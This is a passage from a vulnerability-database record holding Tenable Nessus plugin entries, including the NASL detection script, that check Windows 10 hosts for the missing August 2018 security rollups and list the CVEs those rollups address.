vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - A remote code execution vulnerability exists in\n &quot;Microsoft COM for Windows&quot; when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8400, CVE-2018-8401,\n CVE-2018-8405, CVE-2018-8406)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8390)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2018-8414)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8200, CVE-2018-8204)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8347)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2018-8350)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - A information disclosure vulnerability exists when\n WebAudio Library improperly handles audio requests. An\n attacker who has successfully exploited this\n vulnerability might be able to read privileged data\n across trust boundaries. In browsing scenarios, an\n attacker could convince a user to visit a malicious site\n and leverage the vulnerability to obtain privileged\n information from the browser process, such as sensitive\n data from other opened tabs. An attacker could also\n inject malicious code into advertising networks used by\n trusted sites or embed malicious code on a compromised,\n but trusted, site. The update addresses the\n vulnerability by correcting how the WebAudio Library\n handles audio requests. (CVE-2018-8370)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8266, CVE-2018-8381)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8399, CVE-2018-8404)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - An elevation of privilege vulnerability exists in\n Microsoft browsers allowing sandbox escape. An attacker\n who successfully exploited the vulnerability could use\n the sandbox escape to elevate privileges on an affected\n system. This vulnerability by itself does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. (CVE-2018-8357)\n\n - An Elevation of Privilege vulnerability exists when\n Diagnostics Hub Standard Collector allows file creation\n in arbitrary locations. (CVE-2018-0952)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8377)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8388)", "edition": 29, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-14T00:00:00", "title": "KB4343897: Windows 10 Version 1709 And Windows Server Version 1709 August 2018 Security Update (Foreshadow)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8377", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8388", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8400", "CVE-2018-8355", "CVE-2018-8350", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8390", "CVE-2018-8266", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-8399", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8370", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8414", "CVE-2018-8347", "CVE-2018-8385", "CVE-2018-8381", "CVE-2018-8371", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "modified": "2018-08-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS18_AUG_4343897.NASL", "href": "https://www.tenable.com/plugins/nessus/111687", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111687);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2018-3615\",\n \"CVE-2018-3620\",\n \"CVE-2018-3646\",\n \"CVE-2018-0952\",\n \"CVE-2018-8200\",\n \"CVE-2018-8204\",\n \"CVE-2018-8266\",\n \"CVE-2018-8316\",\n \"CVE-2018-8339\",\n \"CVE-2018-8341\",\n \"CVE-2018-8343\",\n \"CVE-2018-8344\",\n \"CVE-2018-8345\",\n \"CVE-2018-8347\",\n \"CVE-2018-8348\",\n \"CVE-2018-8349\",\n \"CVE-2018-8350\",\n \"CVE-2018-8351\",\n \"CVE-2018-8353\",\n \"CVE-2018-8355\",\n \"CVE-2018-8357\",\n \"CVE-2018-8360\",\n \"CVE-2018-8370\",\n \"CVE-2018-8371\",\n \"CVE-2018-8372\",\n \"CVE-2018-8373\",\n \"CVE-2018-8377\",\n \"CVE-2018-8381\",\n \"CVE-2018-8385\",\n \"CVE-2018-8388\",\n \"CVE-2018-8389\",\n \"CVE-2018-8390\",\n \"CVE-2018-8394\",\n \"CVE-2018-8398\",\n \"CVE-2018-8399\",\n \"CVE-2018-8400\",\n \"CVE-2018-8401\",\n \"CVE-2018-8403\",\n \"CVE-2018-8404\",\n \"CVE-2018-8405\",\n \"CVE-2018-8406\",\n \"CVE-2018-8414\"\n );\n script_bugtraq_id(\n 104977,\n 104978,\n 104980,\n 104982,\n 104983,\n 104984,\n 104985,\n 104986,\n 104987,\n 104988,\n 104992,\n 104995,\n 104998,\n 104999,\n 105001,\n 105005,\n 105006,\n 105007,\n 105008,\n 105011,\n 105012,\n 105016,\n 105027,\n 105030,\n 105041,\n 105048\n );\n script_xref(name:\"MSKB\", value:\"4343897\");\n script_xref(name:\"MSFT\", value:\"MS18-4343897\");\n\n script_name(english:\"KB4343897: Windows 10 Version 1709 And Windows Server Version 1709 August 2018 Security Update (Foreshadow)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4343897.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - A remote code execution vulnerability exists in\n &quot;Microsoft COM for Windows&quot; when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8400, CVE-2018-8401,\n CVE-2018-8405, CVE-2018-8406)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8390)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2018-8414)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8200, CVE-2018-8204)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8347)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2018-8350)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - A information disclosure vulnerability exists when\n WebAudio Library improperly handles audio requests. An\n attacker who has successfully exploited this\n vulnerability might be able to read privileged data\n across trust boundaries. In browsing scenarios, an\n attacker could convince a user to visit a malicious site\n and leverage the vulnerability to obtain privileged\n information from the browser process, such as sensitive\n data from other opened tabs. An attacker could also\n inject malicious code into advertising networks used by\n trusted sites or embed malicious code on a compromised,\n but trusted, site. The update addresses the\n vulnerability by correcting how the WebAudio Library\n handles audio requests. (CVE-2018-8370)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8266, CVE-2018-8381)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8399, CVE-2018-8404)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - An elevation of privilege vulnerability exists in\n Microsoft browsers allowing sandbox escape. An attacker\n who successfully exploited the vulnerability could use\n the sandbox escape to elevate privileges on an affected\n system. This vulnerability by itself does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. (CVE-2018-8357)\n\n - An Elevation of Privilege vulnerability exists when\n Diagnostics Hub Standard Collector allows file creation\n in arbitrary locations. (CVE-2018-0952)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8377)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8388)\");\n # https://support.microsoft.com/en-us/help/4343897/windows-10-update-kb4343897\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?770b7995\");\n # https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8902cebb\");\n script_set_attribute(attribute:\"solution\", value:\n \"Apply Cumulative Update KB4343897 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8344\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", 'microsoft_windows_env_vars.nasl');\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_reg_query.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-08\";\nkbs = make_list('4343897');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"08_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4343897])\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:12:51", "description": "The remote Windows host is missing security update 4343885.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - A remote code execution vulnerability exists in\n &quot;Microsoft COM for Windows&quot; when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8390)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2018-8414)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8200, CVE-2018-8204)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8347)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2018-8350)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - A information disclosure vulnerability exists when\n WebAudio Library improperly handles audio requests. An\n attacker who has successfully exploited this\n vulnerability might be able to read privileged data\n across trust boundaries. In browsing scenarios, an\n attacker could convince a user to visit a malicious site\n and leverage the vulnerability to obtain privileged\n information from the browser process, such as sensitive\n data from other opened tabs. An attacker could also\n inject malicious code into advertising networks used by\n trusted sites or embed malicious code on a compromised,\n but trusted, site. The update addresses the\n vulnerability by correcting how the WebAudio Library\n handles audio requests. (CVE-2018-8370)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8266, CVE-2018-8381)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8399, CVE-2018-8404)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - An elevation of privilege vulnerability exists in\n Microsoft browsers allowing sandbox escape. An attacker\n who successfully exploited the vulnerability could use\n the sandbox escape to elevate privileges on an affected\n system. This vulnerability by itself does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. (CVE-2018-8357)\n\n - An Elevation of Privilege vulnerability exists when\n Diagnostics Hub Standard Collector allows file creation\n in arbitrary locations. (CVE-2018-0952)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n 